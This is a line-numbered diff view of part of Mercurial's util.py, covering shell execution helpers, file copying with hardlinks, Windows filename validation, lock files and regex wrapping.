1050 mainmod = sys.modules[pycompat.sysstr('__main__')]
1049 mainmod = sys.modules[pycompat.sysstr('__main__')]
1051 if hg:
1050 if hg:
1052 _sethgexecutable(hg)
1051 _sethgexecutable(hg)
1053 elif mainfrozen():
1052 elif mainfrozen():
1054 if getattr(sys, 'frozen', None) == 'macosx_app':
1053 if getattr(sys, 'frozen', None) == 'macosx_app':
1055 # Env variable set by py2app
1054 # Env variable set by py2app
1056 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1055 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1057 else:
1056 else:
1058 _sethgexecutable(pycompat.sysexecutable)
1057 _sethgexecutable(pycompat.sysexecutable)
1059 elif (os.path.basename(
1058 elif (os.path.basename(
1060 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1059 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1061 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1060 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1062 else:
1061 else:
1063 exe = findexe('hg') or os.path.basename(sys.argv[0])
1062 exe = findexe('hg') or os.path.basename(sys.argv[0])
1064 _sethgexecutable(exe)
1063 _sethgexecutable(exe)
1065 return _hgexecutable
1064 return _hgexecutable
1066
1065
1067 def _sethgexecutable(path):
1066 def _sethgexecutable(path):
1068 """set location of the 'hg' executable"""
1067 """set location of the 'hg' executable"""
1069 global _hgexecutable
1068 global _hgexecutable
1070 _hgexecutable = path
1069 _hgexecutable = path
1071
1070
1072 def _isstdout(f):
1071 def _isstdout(f):
1073 fileno = getattr(f, 'fileno', None)
1072 fileno = getattr(f, 'fileno', None)
1074 return fileno and fileno() == sys.__stdout__.fileno()
1073 return fileno and fileno() == sys.__stdout__.fileno()
1075
1074
1076 def shellenviron(environ=None):
1075 def shellenviron(environ=None):
1077 """return environ with optional override, useful for shelling out"""
1076 """return environ with optional override, useful for shelling out"""
1078 def py2shell(val):
1077 def py2shell(val):
1079 'convert python object into string that is useful to shell'
1078 'convert python object into string that is useful to shell'
1080 if val is None or val is False:
1079 if val is None or val is False:
1081 return '0'
1080 return '0'
1082 if val is True:
1081 if val is True:
1083 return '1'
1082 return '1'
1084 return str(val)
1083 return str(val)
1085 env = dict(encoding.environ)
1084 env = dict(encoding.environ)
1086 if environ:
1085 if environ:
1087 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1086 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1088 env['HG'] = hgexecutable()
1087 env['HG'] = hgexecutable()
1089 return env
1088 return env
1090
1089
1091 def system(cmd, environ=None, cwd=None, out=None):
1090 def system(cmd, environ=None, cwd=None, out=None):
1092 '''enhanced shell command execution.
1091 '''enhanced shell command execution.
1093 run with environment maybe modified, maybe in different dir.
1092 run with environment maybe modified, maybe in different dir.
1094
1093
1095 if out is specified, it is assumed to be a file-like object that has a
1094 if out is specified, it is assumed to be a file-like object that has a
1096 write() method. stdout and stderr will be redirected to out.'''
1095 write() method. stdout and stderr will be redirected to out.'''
1097 try:
1096 try:
1098 stdout.flush()
1097 stdout.flush()
1099 except Exception:
1098 except Exception:
1100 pass
1099 pass
1101 cmd = quotecommand(cmd)
1100 cmd = quotecommand(cmd)
1102 env = shellenviron(environ)
1101 env = shellenviron(environ)
1103 if out is None or _isstdout(out):
1102 if out is None or _isstdout(out):
1104 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1103 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1105 env=env, cwd=cwd)
1104 env=env, cwd=cwd)
1106 else:
1105 else:
1107 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1106 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1108 env=env, cwd=cwd, stdout=subprocess.PIPE,
1107 env=env, cwd=cwd, stdout=subprocess.PIPE,
1109 stderr=subprocess.STDOUT)
1108 stderr=subprocess.STDOUT)
1110 for line in iter(proc.stdout.readline, ''):
1109 for line in iter(proc.stdout.readline, ''):
1111 out.write(line)
1110 out.write(line)
1112 proc.wait()
1111 proc.wait()
1113 rc = proc.returncode
1112 rc = proc.returncode
1114 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1113 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1115 rc = 0
1114 rc = 0
1116 return rc
1115 return rc
1117
1116
1118 def checksignature(func):
1117 def checksignature(func):
1119 '''wrap a function with code to check for calling errors'''
1118 '''wrap a function with code to check for calling errors'''
1120 def check(*args, **kwargs):
1119 def check(*args, **kwargs):
1121 try:
1120 try:
1122 return func(*args, **kwargs)
1121 return func(*args, **kwargs)
1123 except TypeError:
1122 except TypeError:
1124 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1123 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1125 raise error.SignatureError
1124 raise error.SignatureError
1126 raise
1125 raise
1127
1126
1128 return check
1127 return check
1129
1128
1130 # a whilelist of known filesystems where hardlink works reliably
1129 # a whilelist of known filesystems where hardlink works reliably
1131 _hardlinkfswhitelist = {
1130 _hardlinkfswhitelist = {
1132 'btrfs',
1131 'btrfs',
1133 'ext2',
1132 'ext2',
1134 'ext3',
1133 'ext3',
1135 'ext4',
1134 'ext4',
1136 'hfs',
1135 'hfs',
1137 'jfs',
1136 'jfs',
1138 'reiserfs',
1137 'reiserfs',
1139 'tmpfs',
1138 'tmpfs',
1140 'ufs',
1139 'ufs',
1141 'xfs',
1140 'xfs',
1142 'zfs',
1141 'zfs',
1143 }
1142 }
1144
1143
1145 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1144 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1146 '''copy a file, preserving mode and optionally other stat info like
1145 '''copy a file, preserving mode and optionally other stat info like
1147 atime/mtime
1146 atime/mtime
1148
1147
1149 checkambig argument is used with filestat, and is useful only if
1148 checkambig argument is used with filestat, and is useful only if
1150 destination file is guarded by any lock (e.g. repo.lock or
1149 destination file is guarded by any lock (e.g. repo.lock or
1151 repo.wlock).
1150 repo.wlock).
1152
1151
1153 copystat and checkambig should be exclusive.
1152 copystat and checkambig should be exclusive.
1154 '''
1153 '''
1155 assert not (copystat and checkambig)
1154 assert not (copystat and checkambig)
1156 oldstat = None
1155 oldstat = None
1157 if os.path.lexists(dest):
1156 if os.path.lexists(dest):
1158 if checkambig:
1157 if checkambig:
1159 oldstat = checkambig and filestat.frompath(dest)
1158 oldstat = checkambig and filestat.frompath(dest)
1160 unlink(dest)
1159 unlink(dest)
1161 if hardlink:
1160 if hardlink:
1162 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1161 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1163 # unless we are confident that dest is on a whitelisted filesystem.
1162 # unless we are confident that dest is on a whitelisted filesystem.
1164 try:
1163 try:
1165 fstype = getfstype(os.path.dirname(dest))
1164 fstype = getfstype(os.path.dirname(dest))
1166 except OSError:
1165 except OSError:
1167 fstype = None
1166 fstype = None
1168 if fstype not in _hardlinkfswhitelist:
1167 if fstype not in _hardlinkfswhitelist:
1169 hardlink = False
1168 hardlink = False
1170 if hardlink:
1169 if hardlink:
1171 try:
1170 try:
1172 oslink(src, dest)
1171 oslink(src, dest)
1173 return
1172 return
1174 except (IOError, OSError):
1173 except (IOError, OSError):
1175 pass # fall back to normal copy
1174 pass # fall back to normal copy
1176 if os.path.islink(src):
1175 if os.path.islink(src):
1177 os.symlink(os.readlink(src), dest)
1176 os.symlink(os.readlink(src), dest)
1178 # copytime is ignored for symlinks, but in general copytime isn't needed
1177 # copytime is ignored for symlinks, but in general copytime isn't needed
1179 # for them anyway
1178 # for them anyway
1180 else:
1179 else:
1181 try:
1180 try:
1182 shutil.copyfile(src, dest)
1181 shutil.copyfile(src, dest)
1183 if copystat:
1182 if copystat:
1184 # copystat also copies mode
1183 # copystat also copies mode
1185 shutil.copystat(src, dest)
1184 shutil.copystat(src, dest)
1186 else:
1185 else:
1187 shutil.copymode(src, dest)
1186 shutil.copymode(src, dest)
1188 if oldstat and oldstat.stat:
1187 if oldstat and oldstat.stat:
1189 newstat = filestat.frompath(dest)
1188 newstat = filestat.frompath(dest)
1190 if newstat.isambig(oldstat):
1189 if newstat.isambig(oldstat):
1191 # stat of copied file is ambiguous to original one
1190 # stat of copied file is ambiguous to original one
1192 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1191 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1193 os.utime(dest, (advanced, advanced))
1192 os.utime(dest, (advanced, advanced))
1194 except shutil.Error as inst:
1193 except shutil.Error as inst:
1195 raise Abort(str(inst))
1194 raise Abort(str(inst))
1196
1195
1197 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1196 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1198 """Copy a directory tree using hardlinks if possible."""
1197 """Copy a directory tree using hardlinks if possible."""
1199 num = 0
1198 num = 0
1200
1199
1201 gettopic = lambda: hardlink and _('linking') or _('copying')
1200 gettopic = lambda: hardlink and _('linking') or _('copying')
1202
1201
1203 if os.path.isdir(src):
1202 if os.path.isdir(src):
1204 if hardlink is None:
1203 if hardlink is None:
1205 hardlink = (os.stat(src).st_dev ==
1204 hardlink = (os.stat(src).st_dev ==
1206 os.stat(os.path.dirname(dst)).st_dev)
1205 os.stat(os.path.dirname(dst)).st_dev)
1207 topic = gettopic()
1206 topic = gettopic()
1208 os.mkdir(dst)
1207 os.mkdir(dst)
1209 for name, kind in listdir(src):
1208 for name, kind in listdir(src):
1210 srcname = os.path.join(src, name)
1209 srcname = os.path.join(src, name)
1211 dstname = os.path.join(dst, name)
1210 dstname = os.path.join(dst, name)
1212 def nprog(t, pos):
1211 def nprog(t, pos):
1213 if pos is not None:
1212 if pos is not None:
1214 return progress(t, pos + num)
1213 return progress(t, pos + num)
1215 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1214 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1216 num += n
1215 num += n
1217 else:
1216 else:
1218 if hardlink is None:
1217 if hardlink is None:
1219 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1218 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1220 os.stat(os.path.dirname(dst)).st_dev)
1219 os.stat(os.path.dirname(dst)).st_dev)
1221 topic = gettopic()
1220 topic = gettopic()
1222
1221
1223 if hardlink:
1222 if hardlink:
1224 try:
1223 try:
1225 oslink(src, dst)
1224 oslink(src, dst)
1226 except (IOError, OSError):
1225 except (IOError, OSError):
1227 hardlink = False
1226 hardlink = False
1228 shutil.copy(src, dst)
1227 shutil.copy(src, dst)
1229 else:
1228 else:
1230 shutil.copy(src, dst)
1229 shutil.copy(src, dst)
1231 num += 1
1230 num += 1
1232 progress(topic, num)
1231 progress(topic, num)
1233 progress(topic, None)
1232 progress(topic, None)
1234
1233
1235 return hardlink, num
1234 return hardlink, num
1236
1235
1237 _winreservednames = b'''con prn aux nul
1236 _winreservednames = b'''con prn aux nul
1238 com1 com2 com3 com4 com5 com6 com7 com8 com9
1237 com1 com2 com3 com4 com5 com6 com7 com8 com9
1239 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1238 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1240 _winreservedchars = ':*?"<>|'
1239 _winreservedchars = ':*?"<>|'
1241 def checkwinfilename(path):
1240 def checkwinfilename(path):
1242 r'''Check that the base-relative path is a valid filename on Windows.
1241 r'''Check that the base-relative path is a valid filename on Windows.
1243 Returns None if the path is ok, or a UI string describing the problem.
1242 Returns None if the path is ok, or a UI string describing the problem.
1244
1243
1245 >>> checkwinfilename("just/a/normal/path")
1244 >>> checkwinfilename("just/a/normal/path")
1246 >>> checkwinfilename("foo/bar/con.xml")
1245 >>> checkwinfilename("foo/bar/con.xml")
1247 "filename contains 'con', which is reserved on Windows"
1246 "filename contains 'con', which is reserved on Windows"
1248 >>> checkwinfilename("foo/con.xml/bar")
1247 >>> checkwinfilename("foo/con.xml/bar")
1249 "filename contains 'con', which is reserved on Windows"
1248 "filename contains 'con', which is reserved on Windows"
1250 >>> checkwinfilename("foo/bar/xml.con")
1249 >>> checkwinfilename("foo/bar/xml.con")
1251 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1250 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1252 "filename contains 'AUX', which is reserved on Windows"
1251 "filename contains 'AUX', which is reserved on Windows"
1253 >>> checkwinfilename("foo/bar/bla:.txt")
1252 >>> checkwinfilename("foo/bar/bla:.txt")
1254 "filename contains ':', which is reserved on Windows"
1253 "filename contains ':', which is reserved on Windows"
1255 >>> checkwinfilename("foo/bar/b\07la.txt")
1254 >>> checkwinfilename("foo/bar/b\07la.txt")
1256 "filename contains '\\x07', which is invalid on Windows"
1255 "filename contains '\\x07', which is invalid on Windows"
1257 >>> checkwinfilename("foo/bar/bla ")
1256 >>> checkwinfilename("foo/bar/bla ")
1258 "filename ends with ' ', which is not allowed on Windows"
1257 "filename ends with ' ', which is not allowed on Windows"
1259 >>> checkwinfilename("../bar")
1258 >>> checkwinfilename("../bar")
1260 >>> checkwinfilename("foo\\")
1259 >>> checkwinfilename("foo\\")
1261 "filename ends with '\\', which is invalid on Windows"
1260 "filename ends with '\\', which is invalid on Windows"
1262 >>> checkwinfilename("foo\\/bar")
1261 >>> checkwinfilename("foo\\/bar")
1263 "directory name ends with '\\', which is invalid on Windows"
1262 "directory name ends with '\\', which is invalid on Windows"
1264 '''
1263 '''
1265 if path.endswith('\\'):
1264 if path.endswith('\\'):
1266 return _("filename ends with '\\', which is invalid on Windows")
1265 return _("filename ends with '\\', which is invalid on Windows")
1267 if '\\/' in path:
1266 if '\\/' in path:
1268 return _("directory name ends with '\\', which is invalid on Windows")
1267 return _("directory name ends with '\\', which is invalid on Windows")
1269 for n in path.replace('\\', '/').split('/'):
1268 for n in path.replace('\\', '/').split('/'):
1270 if not n:
1269 if not n:
1271 continue
1270 continue
1272 for c in _filenamebytestr(n):
1271 for c in _filenamebytestr(n):
1273 if c in _winreservedchars:
1272 if c in _winreservedchars:
1274 return _("filename contains '%s', which is reserved "
1273 return _("filename contains '%s', which is reserved "
1275 "on Windows") % c
1274 "on Windows") % c
1276 if ord(c) <= 31:
1275 if ord(c) <= 31:
1277 return _("filename contains %r, which is invalid "
1276 return _("filename contains %r, which is invalid "
1278 "on Windows") % c
1277 "on Windows") % c
1279 base = n.split('.')[0]
1278 base = n.split('.')[0]
1280 if base and base.lower() in _winreservednames:
1279 if base and base.lower() in _winreservednames:
1281 return _("filename contains '%s', which is reserved "
1280 return _("filename contains '%s', which is reserved "
1282 "on Windows") % base
1281 "on Windows") % base
1283 t = n[-1]
1282 t = n[-1]
1284 if t in '. ' and n not in '..':
1283 if t in '. ' and n not in '..':
1285 return _("filename ends with '%s', which is not allowed "
1284 return _("filename ends with '%s', which is not allowed "
1286 "on Windows") % t
1285 "on Windows") % t
1287
1286
1288 if pycompat.osname == 'nt':
1287 if pycompat.osname == 'nt':
1289 checkosfilename = checkwinfilename
1288 checkosfilename = checkwinfilename
1290 timer = time.clock
1289 timer = time.clock
1291 else:
1290 else:
1292 checkosfilename = platform.checkosfilename
1291 checkosfilename = platform.checkosfilename
1293 timer = time.time
1292 timer = time.time
1294
1293
1295 if safehasattr(time, "perf_counter"):
1294 if safehasattr(time, "perf_counter"):
1296 timer = time.perf_counter
1295 timer = time.perf_counter
1297
1296
1298 def makelock(info, pathname):
1297 def makelock(info, pathname):
1299 try:
1298 try:
1300 return os.symlink(info, pathname)
1299 return os.symlink(info, pathname)
1301 except OSError as why:
1300 except OSError as why:
1302 if why.errno == errno.EEXIST:
1301 if why.errno == errno.EEXIST:
1303 raise
1302 raise
1304 except AttributeError: # no symlink in os
1303 except AttributeError: # no symlink in os
1305 pass
1304 pass
1306
1305
1307 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1306 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1308 os.write(ld, info)
1307 os.write(ld, info)
1309 os.close(ld)
1308 os.close(ld)
1310
1309
1311 def readlock(pathname):
1310 def readlock(pathname):
1312 try:
1311 try:
1313 return os.readlink(pathname)
1312 return os.readlink(pathname)
1314 except OSError as why:
1313 except OSError as why:
1315 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1314 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1316 raise
1315 raise
1317 except AttributeError: # no symlink in os
1316 except AttributeError: # no symlink in os
1318 pass
1317 pass
1319 fp = posixfile(pathname)
1318 fp = posixfile(pathname)
1320 r = fp.read()
1319 r = fp.read()
1321 fp.close()
1320 fp.close()
1322 return r
1321 return r
1323
1322
1324 def fstat(fp):
1323 def fstat(fp):
1325 '''stat file object that may not have fileno method.'''
1324 '''stat file object that may not have fileno method.'''
1326 try:
1325 try:
1327 return os.fstat(fp.fileno())
1326 return os.fstat(fp.fileno())
1328 except AttributeError:
1327 except AttributeError:
1329 return os.stat(fp.name)
1328 return os.stat(fp.name)
1330
1329
1331 # File system features
1330 # File system features
1332
1331
1333 def fscasesensitive(path):
1332 def fscasesensitive(path):
1334 """
1333 """
1335 Return true if the given path is on a case-sensitive filesystem
1334 Return true if the given path is on a case-sensitive filesystem
1336
1335
1337 Requires a path (like /foo/.hg) ending with a foldable final
1336 Requires a path (like /foo/.hg) ending with a foldable final
1338 directory component.
1337 directory component.
1339 """
1338 """
1340 s1 = os.lstat(path)
1339 s1 = os.lstat(path)
1341 d, b = os.path.split(path)
1340 d, b = os.path.split(path)
1342 b2 = b.upper()
1341 b2 = b.upper()
1343 if b == b2:
1342 if b == b2:
1344 b2 = b.lower()
1343 b2 = b.lower()
1345 if b == b2:
1344 if b == b2:
1346 return True # no evidence against case sensitivity
1345 return True # no evidence against case sensitivity
1347 p2 = os.path.join(d, b2)
1346 p2 = os.path.join(d, b2)
1348 try:
1347 try:
1349 s2 = os.lstat(p2)
1348 s2 = os.lstat(p2)
1350 if s2 == s1:
1349 if s2 == s1:
1351 return False
1350 return False
1352 return True
1351 return True
1353 except OSError:
1352 except OSError:
1354 return True
1353 return True
1355
1354
1356 try:
1355 try:
1357 import re2
1356 import re2
1358 _re2 = None
1357 _re2 = None
1359 except ImportError:
1358 except ImportError:
1360 _re2 = False
1359 _re2 = False
1361
1360
1362 class _re(object):
1361 class _re(object):
1363 def _checkre2(self):
1362 def _checkre2(self):
1364 global _re2
1363 global _re2
1365 try:
1364 try:
1366 # check if match works, see issue3964
1365 # check if match works, see issue3964
1367 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1366 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1368 except ImportError:
1367 except ImportError:
1369 _re2 = False
1368 _re2 = False
1370
1369
1371 def compile(self, pat, flags=0):
1370 def compile(self, pat, flags=0):
1372 '''Compile a regular expression, using re2 if possible
1371 '''Compile a regular expression, using re2 if possible
1373
1372
1374 For best performance, use only re2-compatible regexp features. The
1373 For best performance, use only re2-compatible regexp features. The
1375 only flags from the re module that are re2-compatible are
1374 only flags from the re module that are re2-compatible are
1376 IGNORECASE and MULTILINE.'''
1375 IGNORECASE and MULTILINE.'''
1377 if _re2 is None:
1376 if _re2 is None:
1378 self._checkre2()
1377 self._checkre2()
1379 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1378 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1380 if flags & remod.IGNORECASE:
1379 if flags & remod.IGNORECASE:
1381 pat = '(?i)' + pat
1380 pat = '(?i)' + pat
1382 if flags & remod.MULTILINE:
1381 if flags & remod.MULTILINE:
1383 pat = '(?m)' + pat
1382 pat = '(?m)' + pat
1384 try:
1383 try:
1385 return re2.compile(pat)
1384 return re2.compile(pat)
1386 except re2.error:
1385 except re2.error:
1387 pass
1386 pass
1388 return remod.compile(pat, flags)
1387 return remod.compile(pat, flags)
1389
1388
1390 @propertycache
1389 @propertycache
1391 def escape(self):
1390 def escape(self):
1392 '''Return the version of escape corresponding to self.compile.
1391 '''Return the version of escape corresponding to self.compile.
1393
1392
1394 This is imperfect because whether re2 or re is used for a particular
1393 This is imperfect because whether re2 or re is used for a particular
1395 function depends on the flags, etc, but it's the best we can do.
1394 function depends on the flags, etc, but it's the best we can do.
1396 '''
1395 '''
1397 global _re2
1396 global _re2
1398 if _re2 is None:
1397 if _re2 is None:
1399 self._checkre2()
1398 self._checkre2()
1400 if _re2:
1399 if _re2:
1401 return re2.escape
1400 return re2.escape
1402 else:
1401 else:
1403 return remod.escape
1402 return remod.escape
1404
1403
1405 re = _re()
1404 re = _re()
1406
1405
1407 _fspathcache = {}
1406 _fspathcache = {}
1408 def fspath(name, root):
1407 def fspath(name, root):
1409 '''Get name in the case stored in the filesystem
1408 '''Get name in the case stored in the filesystem
1410
1409
1411 The name should be relative to root, and be normcase-ed for efficiency.
1410 The name should be relative to root, and be normcase-ed for efficiency.
1412
1411
1413 Note that this function is unnecessary, and should not be
1412 Note that this function is unnecessary, and should not be
1414 called, for case-sensitive filesystems (simply because it's expensive).
1413 called, for case-sensitive filesystems (simply because it's expensive).
1415
1414
1416 The root should be normcase-ed, too.
1415 The root should be normcase-ed, too.
1417 '''
1416 '''
1418 def _makefspathcacheentry(dir):
1417 def _makefspathcacheentry(dir):
1419 return dict((normcase(n), n) for n in os.listdir(dir))
1418 return dict((normcase(n), n) for n in os.listdir(dir))
1420
1419
1421 seps = pycompat.ossep
1420 seps = pycompat.ossep
1422 if pycompat.osaltsep:
1421 if pycompat.osaltsep:
1423 seps = seps + pycompat.osaltsep
1422 seps = seps + pycompat.osaltsep
1424 # Protect backslashes. This gets silly very quickly.
1423 # Protect backslashes. This gets silly very quickly.
1425 seps.replace('\\','\\\\')
1424 seps.replace('\\','\\\\')
1426 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1425 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1427 dir = os.path.normpath(root)
1426 dir = os.path.normpath(root)
1428 result = []
1427 result = []
1429 for part, sep in pattern.findall(name):
1428 for part, sep in pattern.findall(name):
1430 if sep:
1429 if sep:
1431 result.append(sep)
1430 result.append(sep)
1432 continue
1431 continue
1433
1432
1434 if dir not in _fspathcache:
1433 if dir not in _fspathcache:
1435 _fspathcache[dir] = _makefspathcacheentry(dir)
1434 _fspathcache[dir] = _makefspathcacheentry(dir)
1436 contents = _fspathcache[dir]
1435 contents = _fspathcache[dir]
1437
1436
1438 found = contents.get(part)
1437 found = contents.get(part)
1439 if not found:
1438 if not found:
1440 # retry "once per directory" per "dirstate.walk" which
1439 # retry "once per directory" per "dirstate.walk" which
1441 # may take place for each patches of "hg qpush", for example
1440 # may take place for each patches of "hg qpush", for example
1442 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1441 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1443 found = contents.get(part)
1442 found = contents.get(part)
1444
1443
1445 result.append(found or part)
1444 result.append(found or part)
1446 dir = os.path.join(dir, part)
1445 dir = os.path.join(dir, part)
1447
1446
1448 return ''.join(result)
1447 return ''.join(result)
1449
1448
1450 def getfstype(dirpath):
1449 def getfstype(dirpath):
1451 '''Get the filesystem type name from a directory (best-effort)
1450 '''Get the filesystem type name from a directory (best-effort)
1452
1451
1453 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1452 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1454 '''
1453 '''
1455 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1454 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1456
1455
1457 def checknlink(testfile):
1456 def checknlink(testfile):
1458 '''check whether hardlink count reporting works properly'''
1457 '''check whether hardlink count reporting works properly'''
1459
1458
1460 # testfile may be open, so we need a separate file for checking to
1459 # testfile may be open, so we need a separate file for checking to
1461 # work around issue2543 (or testfile may get lost on Samba shares)
1460 # work around issue2543 (or testfile may get lost on Samba shares)
1462 f1 = testfile + ".hgtmp1"
1461 f1 = testfile + ".hgtmp1"
1463 if os.path.lexists(f1):
1462 if os.path.lexists(f1):
1464 return False
1463 return False
1465 try:
1464 try:
1466 posixfile(f1, 'w').close()
1465 posixfile(f1, 'w').close()
1467 except IOError:
1466 except IOError:
1468 try:
1467 try:
1469 os.unlink(f1)
1468 os.unlink(f1)
1470 except OSError:
1469 except OSError:
1471 pass
1470 pass
1472 return False
1471 return False
1473
1472
1474 f2 = testfile + ".hgtmp2"
1473 f2 = testfile + ".hgtmp2"
1475 fd = None
1474 fd = None
1476 try:
1475 try:
1477 oslink(f1, f2)
1476 oslink(f1, f2)
1478 # nlinks() may behave differently for files on Windows shares if
1477 # nlinks() may behave differently for files on Windows shares if
1479 # the file is open.
1478 # the file is open.
1480 fd = posixfile(f2)
1479 fd = posixfile(f2)
1481 return nlinks(f2) > 1
1480 return nlinks(f2) > 1
1482 except OSError:
1481 except OSError:
1483 return False
1482 return False
1484 finally:
1483 finally:
1485 if fd is not None:
1484 if fd is not None:
1486 fd.close()
1485 fd.close()
1487 for f in (f1, f2):
1486 for f in (f1, f2):
1488 try:
1487 try:
1489 os.unlink(f)
1488 os.unlink(f)
1490 except OSError:
1489 except OSError:
1491 pass
1490 pass
1492
1491
1493 def endswithsep(path):
1492 def endswithsep(path):
1494 '''Check path ends with os.sep or os.altsep.'''
1493 '''Check path ends with os.sep or os.altsep.'''
1495 return (path.endswith(pycompat.ossep)
1494 return (path.endswith(pycompat.ossep)
1496 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1495 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1497
1496
1498 def splitpath(path):
1497 def splitpath(path):
1499 '''Split path by os.sep.
1498 '''Split path by os.sep.
1500 Note that this function does not use os.altsep because this is
1499 Note that this function does not use os.altsep because this is
1501 an alternative of simple "xxx.split(os.sep)".
1500 an alternative of simple "xxx.split(os.sep)".
1502 It is recommended to use os.path.normpath() before using this
1501 It is recommended to use os.path.normpath() before using this
1503 function if need.'''
1502 function if need.'''
1504 return path.split(pycompat.ossep)
1503 return path.split(pycompat.ossep)
1505
1504
1506 def gui():
1505 def gui():
1507 '''Are we running in a GUI?'''
1506 '''Are we running in a GUI?'''
1508 if pycompat.sysplatform == 'darwin':
1507 if pycompat.sysplatform == 'darwin':
1509 if 'SSH_CONNECTION' in encoding.environ:
1508 if 'SSH_CONNECTION' in encoding.environ:
1510 # handle SSH access to a box where the user is logged in
1509 # handle SSH access to a box where the user is logged in
1511 return False
1510 return False
1512 elif getattr(osutil, 'isgui', None):
1511 elif getattr(osutil, 'isgui', None):
1513 # check if a CoreGraphics session is available
1512 # check if a CoreGraphics session is available
1514 return osutil.isgui()
1513 return osutil.isgui()
1515 else:
1514 else:
1516 # pure build; use a safe default
1515 # pure build; use a safe default
1517 return True
1516 return True
1518 else:
1517 else:
1519 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1518 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1520
1519
1521 def mktempcopy(name, emptyok=False, createmode=None):
1520 def mktempcopy(name, emptyok=False, createmode=None):
1522 """Create a temporary file with the same contents from name
1521 """Create a temporary file with the same contents from name
1523
1522
1524 The permission bits are copied from the original file.
1523 The permission bits are copied from the original file.
1525
1524
1526 If the temporary file is going to be truncated immediately, you
1525 If the temporary file is going to be truncated immediately, you
1527 can use emptyok=True as an optimization.
1526 can use emptyok=True as an optimization.
1528
1527
1529 Returns the name of the temporary file.
1528 Returns the name of the temporary file.
1530 """
1529 """
1531 d, fn = os.path.split(name)
1530 d, fn = os.path.split(name)
1532 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1531 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1533 os.close(fd)
1532 os.close(fd)
1534 # Temporary files are created with mode 0600, which is usually not
1533 # Temporary files are created with mode 0600, which is usually not
1535 # what we want. If the original file already exists, just copy
1534 # what we want. If the original file already exists, just copy
1536 # its mode. Otherwise, manually obey umask.
1535 # its mode. Otherwise, manually obey umask.
1537 copymode(name, temp, createmode)
1536 copymode(name, temp, createmode)
1538 if emptyok:
1537 if emptyok:
1539 return temp
1538 return temp
1540 try:
1539 try:
1541 try:
1540 try:
1542 ifp = posixfile(name, "rb")
1541 ifp = posixfile(name, "rb")
1543 except IOError as inst:
1542 except IOError as inst:
1544 if inst.errno == errno.ENOENT:
1543 if inst.errno == errno.ENOENT:
1545 return temp
1544 return temp
1546 if not getattr(inst, 'filename', None):
1545 if not getattr(inst, 'filename', None):
1547 inst.filename = name
1546 inst.filename = name
1548 raise
1547 raise
1549 ofp = posixfile(temp, "wb")
1548 ofp = posixfile(temp, "wb")
1550 for chunk in filechunkiter(ifp):
1549 for chunk in filechunkiter(ifp):
1551 ofp.write(chunk)
1550 ofp.write(chunk)
1552 ifp.close()
1551 ifp.close()
1553 ofp.close()
1552 ofp.close()
1554 except: # re-raises
1553 except: # re-raises
1555 try: os.unlink(temp)
1554 try: os.unlink(temp)
1556 except OSError: pass
1555 except OSError: pass
1557 raise
1556 raise
1558 return temp
1557 return temp
1559
1558
1560 class filestat(object):
1559 class filestat(object):
1561 """help to exactly detect change of a file
1560 """help to exactly detect change of a file
1562
1561
1563 'stat' attribute is result of 'os.stat()' if specified 'path'
1562 'stat' attribute is result of 'os.stat()' if specified 'path'
1564 exists. Otherwise, it is None. This can avoid preparative
1563 exists. Otherwise, it is None. This can avoid preparative
1565 'exists()' examination on client side of this class.
1564 'exists()' examination on client side of this class.
1566 """
1565 """
